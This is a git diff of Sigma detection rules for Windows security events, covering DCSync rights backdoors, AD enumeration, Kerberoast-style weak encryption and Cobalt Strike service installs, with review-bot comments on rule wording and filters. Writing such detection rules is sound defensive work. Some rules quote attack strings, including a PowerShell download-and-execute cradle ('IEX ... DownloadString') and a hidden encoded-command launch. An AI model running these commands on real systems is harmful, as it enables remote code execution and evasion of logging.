--- a/sigma/builtin/security/win_security_account_backdoor_dcsync_rights.yml +++ b/sigma/builtin/security/win_security_account_backdoor_dcsync_rights.yml @@ -1,14 +1,11 @@ title: Powerview Add-DomainObjectAcl DCSync AD Extend Right id: 2c99737c-585d-4431-b61a-c911d86ff32f status: test -description: Backdooring domain object to grant the rights associated with DCSync - to a regular user or machine account using Powerview\Add-DomainObjectAcl DCSync - Extended Right cmdlet, will allow to re-obtain the pwd hashes of any user/computer +description: Backdooring domain object to grant the rights associated with DCSync to a regular user or machine account using Powerview\Add-DomainObjectAcl DCSync Extended Right cmdlet, will allow to re-obtain the pwd hashes of any user/computer references: - https://twitter.com/menasec1/status/1111556090137903104 - https://www.specterops.io/assets/resources/an_ace_up_the_sleeve.pdf -author: Samir Bousseaden; Roberto Rodriguez @Cyb3rWard0g; oscd.community; Tim Shelton; - Maxence Fossat +author: Samir Bousseaden; Roberto Rodriguez @Cyb3rWard0g; oscd.community; Tim Shelton; Maxence Fossat date: 2019/04/03 modified: 2022/08/16 tags: 
@@ -17,14 +14,7 @@ tags: logsource: product: windows service: security - definition: The "Audit Directory Service Changes" logging policy must be configured - in order to receive events. Audit events are generated only for objects with - configured system access control lists (SACLs). Audit events are generated - only for objects with configured system access control lists (SACLs) and only - when accessed in a manner that matches their SACL settings. This policy covers - the following events ids - 5136, 5137, 5138, 5139, 5141. Note that the default - policy does not cover User objects. For that a custom AuditRule need to be - setup (See https://github.com/OTRF/Set-AuditRule) + definition: The "Audit Directory Service Changes" logging policy must be configured in order to receive events. Audit events are generated only for objects with configured system access control lists (SACLs). Audit events are generated only for objects with configured system access control lists (SACLs) and only when accessed in a manner that matches their SACL settings. This policy covers the following events ids - 5136, 5137, 5138, 5139, 5141. Note that the default policy does not cover User objects. For that a custom AuditRule need to be setup (See https://github.com/OTRF/Set-AuditRule) detection: security: Channel: Security @@ -42,7 +32,6 @@ detection: - dnsZone condition: security and (selection and not 1 of filter*) falsepositives: - - New Domain Controller computer account, check user SIDs within the value attribute - of event 5136 and verify if it's a regular user or DC computer account. + - New Domain Controller computer account, check user SIDs within the value attribute of event 5136 and verify if it's a regular user or DC computer account. level: high ruletype: Sigma diff --git a/sigma/builtin/security/win_security_account_discovery.yml b/sigma/builtin/security/win_security_account_discovery.yml index 2f1489213..ac44a8d05 100644 
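Review bot: The reflowed `definition:` line still carries the sentence "Audit events are generated only for objects with configured system access control lists (SACLs)" twice in a row, once on its own and once as the opening of the "... and only when accessed in a manner that matches their SACL settings" sentence; since the line is being rewritten anyway, the first copy should be dropped. The reflow itself only changes whitespace, so the detection logic is unaffected.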
--- a/sigma/builtin/security/win_security_account_discovery.yml +++ b/sigma/builtin/security/win_security_account_discovery.yml @@ -1,8 +1,7 @@ title: AD Privileged Users or Groups Reconnaissance id: 35ba1d85-724d-42a3-889f-2e2362bcaf23 status: test -description: Detect priv users or groups recon based on 4661 eventid and known privileged - users or groups SIDs +description: Detect priv users or groups recon based on 4661 eventid and known privileged users or groups SIDs references: - https://blog.menasec.net/2019/02/threat-hunting-5-detecting-enumeration.html author: Samir Bousseaden @@ -24,17 +23,17 @@ detection: - SAM_USER - SAM_GROUP selection_object: - - ObjectName|endswith: - - '-512' - - '-502' - - '-500' - - '-505' - - '-519' - - '-520' - - '-544' - - '-551' - - '-555' - - ObjectName|contains: admin + - ObjectName|endswith: + - '-512' + - '-502' + - '-500' + - '-505' + - '-519' + - '-520' + - '-544' + - '-551' + - '-555' + - ObjectName|contains: admin filter: SubjectUserName|endswith: $ condition: security and (selection and selection_object and not filter) diff --git a/sigma/builtin/security/win_security_ad_replication_non_machine_account.yml b/sigma/builtin/security/win_security_ad_replication_non_machine_account.yml index 8473cc035..1d2bf5cc9 100644 --- a/sigma/builtin/security/win_security_ad_replication_non_machine_account.yml +++ b/sigma/builtin/security/win_security_ad_replication_non_machine_account.yml 
@@ -1,8 +1,7 @@ title: Active Directory Replication from Non Machine Account id: 17d619c1-e020-4347-957e-1d1207455c93 status: test -description: Detects potential abuse of Active Directory Replication Service (ADRS) - from a non machine account to request credentials. +description: Detects potential abuse of Active Directory Replication Service (ADRS) from a non machine account to request credentials. references: - https://threathunterplaybook.com/hunts/windows/180815-ADObjectAccessReplication/notebook.html - https://threathunterplaybook.com/library/windows/active_directory_replication.html @@ -27,8 +26,8 @@ detection: - 1131f6ad-9c07-11d1-f79f-00c04fc2dcd2 - 89e95b76-444d-4c62-991a-0facbeda640c filter: - - SubjectUserName|endswith: $ - - SubjectUserName|startswith: MSOL_ + - SubjectUserName|endswith: $ + - SubjectUserName|startswith: MSOL_ # https://docs.microsoft.com/en-us/azure/active-directory/hybrid/reference-connect-accounts-permissions#ad-ds-connector-account condition: security and (selection and not filter) fields: - ComputerName diff --git a/sigma/builtin/security/win_security_ad_user_enumeration.yml b/sigma/builtin/security/win_security_ad_user_enumeration.yml index 8f72b0dac..7371c8ea9 100644 --- a/sigma/builtin/security/win_security_ad_user_enumeration.yml +++ b/sigma/builtin/security/win_security_ad_user_enumeration.yml @@ -5,7 +5,7 @@ description: Detects read access to a domain user from a non-machine account references: - https://www.specterops.io/assets/resources/an_ace_up_the_sleeve.pdf - http://www.stuffithoughtiknew.com/2019/02/detecting-bloodhound.html - - https://docs.microsoft.com/en-us/windows/win32/adschema/attributes-all + - https://docs.microsoft.com/en-us/windows/win32/adschema/attributes-all # For further investigation of the accessed properties - https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4662 author: Maxime Thiebaut (@0xThiebaut) date: 2020/03/30 
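Review bot: The new comment on `SubjectUserName|startswith: MSOL_` explains why the AD DS Connector account is excluded, but a bare name-prefix exclusion covers every account whose name begins with MSOL_, not only the connector account, and replication requests from any such account are silently dropped by the rule. The comment should state that this is an exclusion by naming convention so that reviewers know to verify which accounts carry the prefix, e.g. `- SubjectUserName|startswith: MSOL_ # AD DS Connector account; excludes every MSOL_* account by name prefix, see https://docs.microsoft.com/en-us/azure/active-directory/hybrid/reference-connect-accounts-permissions#ad-ds-connector-account`. The same filter and comment are added as filter_main_msql in the win_security_ad_user_enumeration.yml hunk.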
@@ -16,27 +16,29 @@ tags: logsource: product: windows service: security - definition: 'Requirements: The "Read all properties" permission on the user object - needs to be audited for the "Everyone" principal' + definition: 'Requirements: The "Read all properties" permission on the user object needs to be audited for the "Everyone" principal' detection: security: Channel: Security selection: EventID: 4662 + # Using contains as the data commonly is structured as "%{bf967aba-0de6-11d0-a285-00aa003049e2}" + # The user class (https://docs.microsoft.com/en-us/windows/win32/adschema/c-user) ObjectType|contains: bf967aba-0de6-11d0-a285-00aa003049e2 AccessMask|endswith: - - 1? - - 3? - - 4? - - 7? - - 9? - - B? - - D? - - F? + # Note: Since the Access Mask can have more than once permission we need to add all permutations that include the READ property + - 1? # This covers all access masks that are 1 bytes or shorter and the "Read Property" itself + - 3? # Read Property + Write Property + - 4? # Read Property + Delete Tree + - 7? # Read Property + Write Property + Delete Tree + - 9? # Read Property + List Object + - B? # Read Property + Write Property + List Object + - D? # Read Property + Delete Tree + List Object + - F? # Covers usage of all possible 2 bytes permissions with any or none of the single byte permissions filter_main_machine_accounts: - SubjectUserName|endswith: $ + SubjectUserName|endswith: $ # Exclude machine accounts filter_main_msql: - SubjectUserName|startswith: MSOL_ + SubjectUserName|startswith: MSOL_ # https://docs.microsoft.com/en-us/azure/active-directory/hybrid/reference-connect-accounts-permissions#ad-ds-connector-account condition: security and (selection and not 1 of filter_main_*) falsepositives: - Administrators configuring new users. 
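Review bot: The new comment `4? # Read Property + Delete Tree` does not match its value: if AccessMask is the ADS_RIGHTS_ENUM bit set (READ_PROP 0x10, WRITE_PROP 0x20, DELETE_TREE 0x40, LIST_OBJECT 0x80), then 0x4? is Delete Tree without Read Property, and Read Property + Delete Tree would be `5?`, which the list does not contain; either the comment or the value appears wrong and should be checked against the event 4662 reference the rule already cites. The `1?` comment says "1 bytes or shorter" where a single hex digit is meant, e.g. `- 1? # masks of at most two hex digits whose high digit is 1 (Read Property only)`. The comments should also note that these are string-suffix matches on the mask's textual form, since the approach presumably depends on the field being rendered in hex rather than decimal.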
diff --git a/sigma/builtin/security/win_security_adcs_certificate_template_configuration_vulnerability.yml b/sigma/builtin/security/win_security_adcs_certificate_template_configuration_vulnerability.yml index 837879b6e..9827c3a55 100644 --- a/sigma/builtin/security/win_security_adcs_certificate_template_configuration_vulnerability.yml +++ b/sigma/builtin/security/win_security_adcs_certificate_template_configuration_vulnerability.yml @@ -13,9 +13,7 @@ tags: logsource: product: windows service: security - definition: Certificate services loaded a template would trigger event ID 4898 - and certificate Services template was updated would trigger event ID 4899. - A risk permission seems to be coming if template contain specific flag. + definition: Certificate services loaded a template would trigger event ID 4898 and certificate Services template was updated would trigger event ID 4899. A risk permission seems to be coming if template contain specific flag. detection: security: Channel: Security diff --git a/sigma/builtin/security/win_security_adcs_certificate_template_configuration_vulnerability_eku.yml b/sigma/builtin/security/win_security_adcs_certificate_template_configuration_vulnerability_eku.yml index e069e9fd9..e401010b4 100644 --- a/sigma/builtin/security/win_security_adcs_certificate_template_configuration_vulnerability_eku.yml +++ b/sigma/builtin/security/win_security_adcs_certificate_template_configuration_vulnerability_eku.yml @@ -1,8 +1,7 @@ title: ADCS Certificate Template Configuration Vulnerability with Risky EKU id: bfbd3291-de87-4b7c-88a2-d6a5deb28668 status: test -description: Detects certificate creation with template allowing risk permission subject - and risky EKU +description: Detects certificate creation with template allowing risk permission subject and risky EKU references: - https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf author: Orlinum , BlueDefenZer 
@@ -14,10 +13,7 @@ tags: logsource: product: windows service: security - definition: Certificate services loaded a template would trigger event ID 4898 - and certificate Services template was updated would trigger event ID 4899. - A risk permission seems to be coming if template contain specific flag with - risky EKU. + definition: Certificate services loaded a template would trigger event ID 4898 and certificate Services template was updated would trigger event ID 4899. A risk permission seems to be coming if template contain specific flag with risky EKU. detection: security: Channel: Security @@ -30,6 +26,7 @@ detection: - 2.5.29.37.0 selection11: TemplateContent|contains: CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT + selection20: EventID: 4899 NewTemplateContent|contains: @@ -39,6 +36,7 @@ detection: - 2.5.29.37.0 selection21: NewTemplateContent|contains: CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT + condition: security and ((selection10 and selection11) or (selection20 and selection21)) falsepositives: - Administrator activity diff --git a/sigma/builtin/security/win_security_add_remove_computer.yml b/sigma/builtin/security/win_security_add_remove_computer.yml index 4d6715f1e..de116cbd2 100644 --- a/sigma/builtin/security/win_security_add_remove_computer.yml +++ b/sigma/builtin/security/win_security_add_remove_computer.yml @@ -1,8 +1,7 @@ title: Add or Remove Computer from DC id: 20d96d95-5a20-4cf1-a483-f3bda8a7c037 status: test -description: Detects the creation or removal of a computer. Can be used to detect - attacks such as DCShadow via the creation of a new SPN. +description: Detects the creation or removal of a computer. Can be used to detect attacks such as DCShadow via the creation of a new SPN. references: - https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md - https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4741 
diff --git a/sigma/builtin/security/win_security_admin_share_access.yml b/sigma/builtin/security/win_security_admin_share_access.yml index 802c0597f..3b816fb0b 100644 --- a/sigma/builtin/security/win_security_admin_share_access.yml +++ b/sigma/builtin/security/win_security_admin_share_access.yml @@ -11,8 +11,7 @@ tags: logsource: product: windows service: security - definition: The advanced audit policy setting "Object Access > Audit File Share" - must be configured for Success/Failure + definition: The advanced audit policy setting "Object Access > Audit File Share" must be configured for Success/Failure detection: security: Channel: Security diff --git a/sigma/builtin/security/win_security_alert_active_directory_user_control.yml b/sigma/builtin/security/win_security_alert_active_directory_user_control.yml index 0d6ceea37..adc0d588b 100644 --- a/sigma/builtin/security/win_security_alert_active_directory_user_control.yml +++ b/sigma/builtin/security/win_security_alert_active_directory_user_control.yml @@ -1,8 +1,7 @@ title: Enabled User Right in AD to Control User Objects id: 311b6ce2-7890-4383-a8c2-663a9f6b43cd status: test -description: Detects scenario where if a user is assigned the SeEnableDelegationPrivilege - right in Active Directory it would allow control of other AD user objects. +description: Detects scenario where if a user is assigned the SeEnableDelegationPrivilege right in Active Directory it would allow control of other AD user objects. references: - https://blog.harmj0y.net/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/ author: '@neu5ron' 
@@ -14,10 +13,7 @@ tags: logsource: product: windows service: security - definition: 'Requirements: Audit Policy : Policy Change > Audit Authorization - Policy Change, Group Policy : Computer Configuration\Windows Settings\Security - Settings\Advanced Audit Policy Configuration\Audit Policies\Policy Change\Audit - Authorization Policy Change' + definition: 'Requirements: Audit Policy : Policy Change > Audit Authorization Policy Change, Group Policy : Computer Configuration\Windows Settings\Security Settings\Advanced Audit Policy Configuration\Audit Policies\Policy Change\Audit Authorization Policy Change' detection: security: Channel: Security diff --git a/sigma/builtin/security/win_security_alert_ad_user_backdoors.yml b/sigma/builtin/security/win_security_alert_ad_user_backdoors.yml index e3fcdb2d3..9d74f6581 100644 --- a/sigma/builtin/security/win_security_alert_ad_user_backdoors.yml +++ b/sigma/builtin/security/win_security_alert_ad_user_backdoors.yml @@ -1,8 +1,7 @@ title: Active Directory User Backdoors id: 300bac00-e041-4ee2-9c36-e262656a6ecc status: test -description: Detects scenarios where one can control another users or computers account - without having to use their credentials. +description: Detects scenarios where one can control another users or computers account without having to use their credentials. references: - https://msdn.microsoft.com/en-us/library/cc220234.aspx - https://adsecurity.org/?p=3466 
@@ -16,21 +15,15 @@ tags: logsource: product: windows service: security - definition: 'Requirements: Audit Policy : Account Management > Audit User Account - Management, Group Policy : Computer Configuration\Windows Settings\Security - Settings\Advanced Audit Policy Configuration\Audit Policies\Account Management\Audit - User Account Management, DS Access > Audit Directory Service Changes, Group - Policy : Computer Configuration\Windows Settings\Security Settings\Advanced - Audit Policy Configuration\Audit Policies\DS Access\Audit Directory Service - Changes' + definition: 'Requirements: Audit Policy : Account Management > Audit User Account Management, Group Policy : Computer Configuration\Windows Settings\Security Settings\Advanced Audit Policy Configuration\Audit Policies\Account Management\Audit User Account Management, DS Access > Audit Directory Service Changes, Group Policy : Computer Configuration\Windows Settings\Security Settings\Advanced Audit Policy Configuration\Audit Policies\DS Access\Audit Directory Service Changes' detection: security: Channel: Security selection1: EventID: 4738 filter_null: - - AllowedToDelegateTo: '-' - - AllowedToDelegateTo: null + - AllowedToDelegateTo: '-' + - AllowedToDelegateTo: selection_5136_1: EventID: 5136 AttributeLDAPDisplayName: msDS-AllowedToDelegateTo diff --git a/sigma/builtin/security/win_security_alert_enable_weak_encryption.yml b/sigma/builtin/security/win_security_alert_enable_weak_encryption.yml index 55d75e109..20e4fe9e0 100644 --- a/sigma/builtin/security/win_security_alert_enable_weak_encryption.yml +++ b/sigma/builtin/security/win_security_alert_enable_weak_encryption.yml 
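Review bot: In `filter_null` the second entry was changed from `AllowedToDelegateTo: null` to a bare `AllowedToDelegateTo:`; YAML treats both as null, so the filter still drops events where the field is absent, but the bare form reads like a truncated line and is easy to mistake for a mistake during the next edit. I would keep the intent explicit with `- AllowedToDelegateTo: null`. The `detection` block, including the condition that consumes this filter, continues outside the hunk.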
@@ -1,8 +1,7 @@ title: Weak Encryption Enabled and Kerberoast id: f6de9536-0441-4b3f-a646-f4e00f300ffd status: test -description: Detects scenario where weak encryption is enabled for a user profile - which could be used for hash/password cracking. +description: Detects scenario where weak encryption is enabled for a user profile which could be used for hash/password cracking. references: - https://adsecurity.org/?p=2053 - https://blog.harmj0y.net/redteaming/another-word-on-delegation/ @@ -15,16 +14,18 @@ tags: logsource: product: windows service: security - definition: 'Requirements: Audit Policy : Account Management > Audit User Account - Management, Group Policy : Computer Configuration\Windows Settings\Security - Settings\Advanced Audit Policy Configuration\Audit Policies\Account Management\Audit - User Account Management' + definition: 'Requirements: Audit Policy : Account Management > Audit User Account Management, Group Policy : Computer Configuration\Windows Settings\Security Settings\Advanced Audit Policy Configuration\Audit Policies\Account Management\Audit User Account Management' detection: security: Channel: Security selection: EventID: 4738 - olduac_des: + # According to Microsoft, the bit values are listed here: https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4720 + # However, that seems to be a simple copy from https://docs.microsoft.com/en-US/troubleshoot/windows-server/identity/useraccountcontrol-manipulate-account-properties + # and the actual flags that are used are quite different and, unfortunately, not documented. + # https://github.com/mdecrevoisier/EVTX-to-MITRE-Attack/ contains a number of EVTX files with relevant events, which can be used to extract + # the following values. + olduac_des: # 0x8000 OldUacValue|endswith: - 8??? - 9??? @@ -44,7 +45,7 @@ detection: - D??? - E??? - F??? - olduac_preauth: + olduac_preauth: # 0x10000 OldUacValue|endswith: - 1???? - 3???? 
@@ -64,7 +65,7 @@ detection: - B???? - D???? - F???? - olduac_encrypted: + olduac_encrypted: # 0x800 OldUacValue|endswith: - 8?? - 9?? @@ -84,8 +85,7 @@ detection: - D?? - E?? - F?? - condition: security and (selection and ((newuac_des and not olduac_des) or (newuac_preauth - and not olduac_preauth) or (newuac_encrypted and not olduac_encrypted))) + condition: security and (selection and ((newuac_des and not olduac_des) or (newuac_preauth and not olduac_preauth) or (newuac_encrypted and not olduac_encrypted))) falsepositives: - Unknown level: high diff --git a/sigma/builtin/security/win_security_atsvc_task.yml b/sigma/builtin/security/win_security_atsvc_task.yml index 2712533c9..20f8f6719 100644 --- a/sigma/builtin/security/win_security_atsvc_task.yml +++ b/sigma/builtin/security/win_security_atsvc_task.yml @@ -1,8 +1,7 @@ title: Remote Task Creation via ATSVC Named Pipe id: f6de6525-4509-495a-8a82-1f8b0ed73a00 status: test -description: Detects remote task creation via at.exe or API interacting with ATSVC - namedpipe +description: Detects remote task creation via at.exe or API interacting with ATSVC namedpipe references: - https://blog.menasec.net/2019/03/threat-hunting-25-scheduled-tasks-for.html author: Samir Bousseaden @@ -17,14 +16,13 @@ tags: logsource: product: windows service: security - definition: The advanced audit policy setting "Object Access > Audit Detailed - File Share" must be configured for Success/Failure + definition: The advanced audit policy setting "Object Access > Audit Detailed File Share" must be configured for Success/Failure detection: security: Channel: Security selection: EventID: 5145 - ShareName: \\\\\*\\IPC$ + ShareName: \\\\\*\\IPC$ # looking for the string \\*\IPC$ RelativeTargetName: atsvc Accesses|contains: WriteData condition: security and selection diff --git a/sigma/builtin/security/win_security_audit_log_cleared.yml b/sigma/builtin/security/win_security_audit_log_cleared.yml index f4c8d986d..2bebcf1e8 100644 
--- a/sigma/builtin/security/win_security_audit_log_cleared.yml +++ b/sigma/builtin/security/win_security_audit_log_cleared.yml @@ -1,13 +1,12 @@ title: Security Eventlog Cleared id: d99b79d2-0a6f-4f46-ad8b-260b6e17f982 related: - - id: f2f01843-e7b8-4f95-a35a-d23584476423 - type: obsoletes - - id: a122ac13-daf8-4175-83a2-72c387be339d - type: obsoletes + - id: f2f01843-e7b8-4f95-a35a-d23584476423 + type: obsoletes + - id: a122ac13-daf8-4175-83a2-72c387be339d + type: obsoletes status: test -description: One of the Windows Eventlogs has been cleared. e.g. caused by "wevtutil - cl" command execution +description: One of the Windows Eventlogs has been cleared. e.g. caused by "wevtutil cl" command execution references: - https://twitter.com/deviouspolack/status/832535435960209408 - https://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100 @@ -33,8 +32,7 @@ detection: Provider_Name: Microsoft-Windows-Eventlog condition: security and (1 of selection_*) falsepositives: - - Rollout of log collection agents (the setup routine often includes a reset of - the local Eventlog) + - Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog) - System provisioning (system reset before the golden image creation) level: high ruletype: Sigma diff --git a/sigma/builtin/security/win_security_cobaltstrike_service_installs.yml b/sigma/builtin/security/win_security_cobaltstrike_service_installs.yml index c21dfb17c..f4330b8bd 100644 --- a/sigma/builtin/security/win_security_cobaltstrike_service_installs.yml +++ b/sigma/builtin/security/win_security_cobaltstrike_service_installs.yml 
@@ -1,11 +1,10 @@ title: CobaltStrike Service Installations - Security id: d7a95147-145f-4678-b85d-d1ff4a3bb3f6 related: - - id: 5a105d34-05fc-401e-8553-272b45c1522d - type: derived + - id: 5a105d34-05fc-401e-8553-272b45c1522d + type: derived status: test -description: Detects known malicious service installs that appear in cases in which - a Cobalt Strike beacon elevates privileges or lateral movement +description: Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement references: - https://www.sans.org/webcasts/119395 - https://www.crowdstrike.com/blog/getting-the-bacon-from-cobalt-strike-beacon/ @@ -23,8 +22,7 @@ tags: logsource: product: windows service: security - definition: The 'System Security Extension' audit subcategory need to be enabled - to log the EID 4697 + definition: The 'System Security Extension' audit subcategory need to be enabled to log the EID 4697 detection: security: Channel: Security @@ -42,7 +40,7 @@ detection: selection3: ServiceFileName|contains: powershell -nop -w hidden -encodedcommand selection4: - ServiceFileName|base64offset|contains: 'IEX (New-Object Net.Webclient).DownloadString(''http://127.0.0.1:' + ServiceFileName|base64offset|contains: "IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:" condition: security and (event_id and 1 of selection*) falsepositives: - Unknown diff --git a/sigma/builtin/security/win_security_codeintegrity_check_failure.yml b/sigma/builtin/security/win_security_codeintegrity_check_failure.yml index ac9f6ed33..b5777a689 100644 --- a/sigma/builtin/security/win_security_codeintegrity_check_failure.yml +++ b/sigma/builtin/security/win_security_codeintegrity_check_failure.yml 
@@ -1,10 +1,8 @@ title: Failed Code Integrity Checks id: 470ec5fa-7b4e-4071-b200-4c753100f49b status: stable -description: 'Detects code integrity failures such as missing page hashes or corrupted - drivers due unauthorized modification. This could be a sign of tampered binaries. - - ' +description: | + Detects code integrity failures such as missing page hashes or corrupted drivers due unauthorized modification. This could be a sign of tampered binaries. author: Thomas Patzke date: 2019/12/03 modified: 2023/12/13 diff --git a/sigma/builtin/security/win_security_dce_rpc_smb_spoolss_named_pipe.yml b/sigma/builtin/security/win_security_dce_rpc_smb_spoolss_named_pipe.yml index 1878a409d..cdf71e09a 100644 --- a/sigma/builtin/security/win_security_dce_rpc_smb_spoolss_named_pipe.yml +++ b/sigma/builtin/security/win_security_dce_rpc_smb_spoolss_named_pipe.yml @@ -1,9 +1,7 @@ title: DCERPC SMB Spoolss Named Pipe id: 214e8f95-100a-4e04-bb31-ef6cba8ce07e status: test -description: Detects the use of the spoolss named pipe over SMB. This can be used - to trigger the authentication via NTLM of any machine that has the spoolservice - enabled. +description: Detects the use of the spoolss named pipe over SMB. This can be used to trigger the authentication via NTLM of any machine that has the spoolservice enabled. references: - https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1 - https://dirkjanm.io/a-different-way-of-abusing-zerologon/ @@ -22,7 +20,7 @@ detection: Channel: Security selection: EventID: 5145 - ShareName: \\\\\*\\IPC$ + ShareName: \\\\\*\\IPC$ # looking for the string \\*\IPC$ RelativeTargetName: spoolss condition: security and selection falsepositives: diff --git a/sigma/builtin/security/win_security_dcom_iertutil_dll_hijack.yml b/sigma/builtin/security/win_security_dcom_iertutil_dll_hijack.yml index bf8875b68..ee124c24c 100644 --- a/sigma/builtin/security/win_security_dcom_iertutil_dll_hijack.yml 
+++ b/sigma/builtin/security/win_security_dcom_iertutil_dll_hijack.yml @@ -1,9 +1,7 @@ title: DCOM InternetExplorer.Application Iertutil DLL Hijack - Security id: c39f0c81-7348-4965-ab27-2fde35a1b641 status: test -description: Detects a threat actor creating a file named `iertutil.dll` in the `C:\Program - Files\Internet Explorer\` directory over the network for a DCOM InternetExplorer - DLL Hijack scenario. +description: Detects a threat actor creating a file named `iertutil.dll` in the `C:\Program Files\Internet Explorer\` directory over the network for a DCOM InternetExplorer DLL Hijack scenario. references: - https://threathunterplaybook.com/hunts/windows/201009-RemoteDCOMIErtUtilDLLHijack/notebook.html author: Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR) diff --git a/sigma/builtin/security/win_security_disable_event_auditing.yml b/sigma/builtin/security/win_security_disable_event_auditing.yml index ee9bef55e..7f1d92d9d 100644 --- a/sigma/builtin/security/win_security_disable_event_auditing.yml +++ b/sigma/builtin/security/win_security_disable_event_auditing.yml 
@@ -1,24 +1,14 @@ title: Windows Event Auditing Disabled id: 69aeb277-f15f-4d2d-b32a-55e883609563 related: - - id: ab4561b1-6c7e-48a7-ad08-087cfb9ce8f1 - type: derived + - id: ab4561b1-6c7e-48a7-ad08-087cfb9ce8f1 + type: derived status: test -description: 'Detects scenarios where system auditing (i.e.: Windows event log auditing) - is disabled. - - This may be used in a scenario where an entity would want to bypass local logging - to evade detection when Windows event logging is enabled and reviewed. - - Also, it is recommended to turn off "Local Group Policy Object Processing" via - GPO, which will make sure that Active Directory GPOs take precedence over local/edited - computer policies via something such as "gpedit.msc". - - Please note, that disabling "Local Group Policy Object Processing" may cause an - issue in scenarios of one off specific GPO modifications - however, it is recommended - to perform these modifications in Active Directory anyways. - - ' +description: | + Detects scenarios where system auditing (i.e.: Windows event log auditing) is disabled. + This may be used in a scenario where an entity would want to bypass local logging to evade detection when Windows event logging is enabled and reviewed. + Also, it is recommended to turn off "Local Group Policy Object Processing" via GPO, which will make sure that Active Directory GPOs take precedence over local/edited computer policies via something such as "gpedit.msc". + Please note, that disabling "Local Group Policy Object Processing" may cause an issue in scenarios of one off specific GPO modifications - however, it is recommended to perform these modifications in Active Directory anyways. references: - https://docs.google.com/presentation/d/1dkrldTTlN3La-OjWtkWJBb4hVk6vfsSMBFBERs6R8zA/edit author: '@neu5ron, Nasreddine Bencherchali (Nextron Systems)' 
@@ -37,27 +27,28 @@ detection: selection: EventID: 4719 AuditPolicyChanges|contains: - - '%%8448' - - '%%8450' + - '%%8448' # This is "Success removed" + - '%%8450' # This is "Failure removed" filter_main_guid: + # Note: We filter these GUID to avoid alert duplication as these are covered by ab4561b1-6c7e-48a7-ad08-087cfb9ce8f1 SubcategoryGuid: - - '{0CCE9210-69AE-11D9-BED3-505054503030}' - - '{0CCE9211-69AE-11D9-BED3-505054503030}' - - '{0CCE9212-69AE-11D9-BED3-505054503030}' - - '{0CCE9215-69AE-11D9-BED3-505054503030}' - - '{0CCE9217-69AE-11D9-BED3-505054503030}' - - '{0CCE921B-69AE-11D9-BED3-505054503030}' - - '{0CCE922B-69AE-11D9-BED3-505054503030}' - - '{0CCE922F-69AE-11D9-BED3-505054503030}' - - '{0CCE9230-69AE-11D9-BED3-505054503030}' - - '{0CCE9235-69AE-11D9-BED3-505054503030}' - - '{0CCE9236-69AE-11D9-BED3-505054503030}' - - '{0CCE9237-69AE-11D9-BED3-505054503030}' - - '{0CCE923F-69AE-11D9-BED3-505054503030}' - - '{0CCE9240-69AE-11D9-BED3-505054503030}' - - '{0CCE9242-69AE-11D9-BED3-505054503030}' + - '{0CCE9210-69AE-11D9-BED3-505054503030}' # Audit Security State Change + - '{0CCE9211-69AE-11D9-BED3-505054503030}' # Audit Security System Extension + - '{0CCE9212-69AE-11D9-BED3-505054503030}' # Audit System Integrity + - '{0CCE9215-69AE-11D9-BED3-505054503030}' # Audit Logon + - '{0CCE9217-69AE-11D9-BED3-505054503030}' # Audit Account Lockout + - '{0CCE921B-69AE-11D9-BED3-505054503030}' # Audit Special Logon + - '{0CCE922B-69AE-11D9-BED3-505054503030}' # Audit Process Creation + - '{0CCE922F-69AE-11D9-BED3-505054503030}' # Audit Audit Policy Change + - '{0CCE9230-69AE-11D9-BED3-505054503030}' # Audit Authentication Policy Change + - '{0CCE9235-69AE-11D9-BED3-505054503030}' # Audit User Account Management + - '{0CCE9236-69AE-11D9-BED3-505054503030}' # Audit Computer Account Management + - '{0CCE9237-69AE-11D9-BED3-505054503030}' # Audit Security Group Management + - '{0CCE923F-69AE-11D9-BED3-505054503030}' # Audit Credential Validation + - 
'{0CCE9240-69AE-11D9-BED3-505054503030}' # Audit Kerberos Service Ticket Operations + - '{0CCE9242-69AE-11D9-BED3-505054503030}' # Audit Kerberos Authentication Service' condition: security and (selection and not 1 of filter_main_*) falsepositives: - Unknown -level: low +level: low # Increase this after a testing period in your environment ruletype: Sigma diff --git a/sigma/builtin/security/win_security_disable_event_auditing_critical.yml b/sigma/builtin/security/win_security_disable_event_auditing_critical.yml index edefc9ec5..36c320b8d 100644 --- a/sigma/builtin/security/win_security_disable_event_auditing_critical.yml +++ b/sigma/builtin/security/win_security_disable_event_auditing_critical.yml @@ -1,11 +1,10 @@ title: Important Windows Event Auditing Disabled id: ab4561b1-6c7e-48a7-ad08-087cfb9ce8f1 related: - - id: 69aeb277-f15f-4d2d-b32a-55e883609563 - type: derived + - id: 69aeb277-f15f-4d2d-b32a-55e883609563 + type: derived status: test -description: Detects scenarios where system auditing for important events such as - "Process Creation" or "Logon" events is disabled. +description: Detects scenarios where system auditing for important events such as "Process Creation" or "Logon" events is disabled. references: - https://docs.google.com/presentation/d/1dkrldTTlN3La-OjWtkWJBb4hVk6vfsSMBFBERs6R8zA/edit - https://github.com/SigmaHQ/sigma/blob/master/documentation/logsource-guides/windows/service/security.md 
